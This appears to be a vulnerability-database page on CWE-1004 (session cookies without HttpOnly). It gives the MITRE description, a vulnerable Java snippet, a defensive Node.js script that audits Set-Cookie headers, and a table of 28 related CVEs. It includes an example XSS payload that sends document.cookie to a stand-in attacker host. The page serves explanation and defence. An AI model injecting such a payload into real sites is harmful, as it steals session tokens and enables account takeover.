
CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag: vulnerability list (28)

CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag: a summary of the 28 CVE entries mapped to this weakness class, with AI-generated analysis.

CWE-1004 is a cookie-attribute weakness that leads to exposure of sensitive data: the application stores sensitive information (typically a session identifier or credential) in a cookie but does not set the HttpOnly flag on it. Without that flag, any script running in the page's origin can read the cookie through document.cookie, so an attacker who finds a cross-site scripting (XSS) flaw can exfiltrate the session token and take over the user's account. Developers should set HttpOnly explicitly when issuing such cookies, which stops client-side scripts from reading them, and combine it with the Secure and SameSite attributes. HttpOnly limits the damage of an XSS bug rather than removing it: injected script can no longer read the cookie, but it can still make requests from the victim's browser that carry it, so the XSS itself must be fixed as well.

MITRE CWE official description
CWE: CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag. Description: The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.
Common consequences (2)
Confidentiality: Read Application Data
If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
Integrity: Gain Privileges or Assume Identity
If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.
Mitigations (1)
Implementation: Leverage the HttpOnly flag when setting a sensitive cookie in a response.
Effectiveness: High
Code examples (1)
In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

```java
String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);
// HttpOnly is never set, so the session cookie is readable from document.cookie.
// The fix is c.setHttpOnly(true) (Servlet 3.0+), ideally with c.setSecure(true).
response.addCookie(c);
```
Bad · Java

If the attacker finds an XSS flaw on the site, injected script can read the unprotected cookie and send it to a host the attacker controls:

```javascript
// Injected through XSS: exfiltrates every cookie of the origin that scripts can read.
document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie + '">');
```
Attack · JavaScript
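The following is an added example, not code from the CWE entry or from any product in the list below. It audits a response's Set-Cookie headers the way a pentester or a CI check would: it parses each header, picks out cookies whose name suggests a session or credential (the name pattern is an assumption for this example and should be tuned per application), and reports which of HttpOnly, Secure and SameSite are missing. It also builds the hardened header that the mitigation above calls for. The sample headers are constructed, not captured from a real system.

```javascript
'use strict';
// Added example, not part of the CWE-1004 entry or of any product listed
// on this page: audit Set-Cookie headers for session-bearing cookies that
// lack HttpOnly, Secure or SameSite, and build the hardened form.

// Assumption: cookie names matching this pattern carry a session identifier
// or credential. Tune it to the application being tested.
const SENSITIVE_NAME = /sess|sid|token|auth|jwt/i;

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are case-insensitive (RFC 6265) and are normalised to
// lower case; attributes without a value (HttpOnly, Secure) map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  if (parts.length === 0) return { name: '', value: '', attrs: {} };
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq).trim();
  const value = eq === -1 ? '' : parts[0].slice(eq + 1).trim();
  const attrs = {};
  for (const p of parts.slice(1)) {
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Return one finding per sensitive cookie that is missing a protective
// attribute. Non-sensitive cookies (preferences, analytics) are skipped so
// the report does not bury the CWE-1004 hits in noise.
function auditSetCookies(headers) {
  const findings = [];
  for (const header of headers) {
    const { name, attrs } = parseSetCookie(header);
    if (!SENSITIVE_NAME.test(name)) continue;
    const missing = [];
    if (attrs.httponly !== true) missing.push('HttpOnly'); // CWE-1004
    if (attrs.secure !== true) missing.push('Secure');
    if (!('samesite' in attrs)) missing.push('SameSite');
    if (missing.length > 0) findings.push({ cookie: name, missing });
  }
  return findings;
}

// The hardened header the mitigation calls for. SameSite=Lax keeps
// top-level navigations working; use Strict where that is acceptable.
function buildSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample headers (not captured from any real product).
const SAMPLE_HEADERS = [
  'session_id=a1b2c3d4; Path=/',                      // the CWE example, unprotected
  'theme=dark; Path=/',                               // not sensitive, ignored
  'auth_token=xyz; Path=/; Secure; SameSite=Strict',  // only HttpOnly missing
  buildSessionCookie('session_id', 'a1b2c3d4'),       // hardened form, no finding
];

for (const f of auditSetCookies(SAMPLE_HEADERS)) {
  console.log(`${f.cookie}: missing ${f.missing.join(', ')}`);
}
```

Run with node; the two unprotected sample cookies are reported and the hardened one is silent. In a real test, feed it the `set-cookie` array from the login response (for example `res.headers['set-cookie']` in Node) instead of the constructed list.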
CVE ID | Title | Affected product | CVSS | Risk level (- = not rated) | Published
CVE-2026-42239 | Budibase session cookie without HttpOnly lets XSS take over accounts | budibase | 8.1 | High | 2026-05-07
CVE-2026-0696 | ConnectWise PSA security vulnerability | PSA | 6.5 | Medium | 2026-01-16
CVE-2026-22081 | Tenda N300 security vulnerability | 300Mbps Wireless Router F3 and N300 Easy Setup Router | 7.5 | - | 2026-01-09
CVE-2025-12031 | Azure Access Technology BLU-IC2 and BLU-IC4 security vulnerability | BLU-IC2 | 5.3 | Medium | 2025-10-21
CVE-2025-42909 | SAP Cloud Appliance Library Appliances security vulnerability | SAP Cloud Appliance Library Appliances | 3.0 | Low | 2025-10-14
CVE-2025-27453 | Endress+Hauser MEAC300-FNADE4 security vulnerability | Endress+Hauser MEAC300-FNADE4 | 5.3 | Medium | 2025-07-03
CVE-2025-49189 | SICK Field Analytics and SICK Media Server security vulnerability | SICK Media Server | 5.3 | Medium | 2025-06-12
CVE-2025-47289 | CE Phoenix security vulnerability | PhoenixCart | 6.3 | Medium | 2025-06-02
CVE-2025-24318 | Dario Health USB-C Blood Glucose Monitoring System security vulnerability | Dario Application Database and Internet-based Server Infrastructure | 6.8 | Medium | 2025-02-28
CVE-2025-0479 | CP Plus CP-XR-DE21-S security vulnerability | CP-XR-DE21-S Router | 9.1 | - | 2025-01-20
CVE-2022-43845 | IBM Aspera Console security vulnerability | Aspera Console | 3.7 | Low | 2024-09-24
CVE-2022-33167 | IBM Security Directory Integrator and IBM Security Verify Directory security vulnerability | Security Directory Integrator | 3.7 | Low | 2024-07-30
CVE-2024-41685 | SyroTech SY-GPON-1110-WDONT security vulnerability | SyroTech SY-GPON-1110-WDONT router | 5.3 | - | 2024-07-26
CVE-2024-6739 | Openfind MailGates and Openfind MailAudit security vulnerability | MailGates | 5.3 | Medium | 2024-07-15
CVE-2023-4217 | MOXA PT-G503 security vulnerability | PT-G503 Series | 3.1 | Low | 2023-11-02
CVE-2023-4228 | MOXA ioLogik 4000 Series security vulnerability | ioLogik 4000 Series | 3.1 | Low | 2023-08-24
CVE-2023-2876 | ABB REX640 security vulnerability | REX640 PCL1 | 3.1 | Low | 2023-06-13
CVE-2022-21939 | Johnson Controls System Configuration Tool cross-site scripting vulnerability | System Configuration Tool (SCT) | 7.5 | High | 2023-02-09
CVE-2019-25091 | nsupdate.info security vulnerability | nsupdate.info | 3.7 | Low | 2022-12-27
CVE-2022-4630 | daloRADIUS security vulnerability | lirantal/daloradius | 5.3 | - | 2022-12-21
CVE-2022-25172 | InHand Networks InRouter302 cross-site scripting vulnerability | InRouter302 | 6.1 | - | 2022-05-12
CVE-2021-42115 | Business-Dna Solution GmbH TopEase security vulnerability | TopEase | 8.1 | High | 2021-11-30
CVE-2021-39210 | GLPI security vulnerability | glpi | 6.5 | Medium | 2021-09-15
CVE-2021-3706 | Pi-Hole Adminlte security vulnerability | pi-hole/adminlte | 7.5 | - | 2021-09-15
CVE-2021-34563 | Pepperl Fuchs WirelessHART-Gateway security vulnerability | WHA-GW-F2D2-0-AS-Z2-ETH | 3.3 | Low | 2021-08-31
CVE-2020-27658 | Synology Router Manager security vulnerability | Synology Router Manager (SRM) | 7.1 | High | 2020-10-29
CVE-2020-6267 | SAP Disclosure Management cross-site scripting vulnerability | SAP Disclosure Management | 6.5 | - | 2020-07-14
CVE-2019-8283 | Gemalto Admin Control Center information disclosure vulnerability | Sentinel LDK RTE | 6.5 | - | 2019-06-07

CWE-1004 (Sensitive Cookie Without 'HttpOnly' Flag) is a common weakness class; this platform lists the 28 CVE entries associated with it.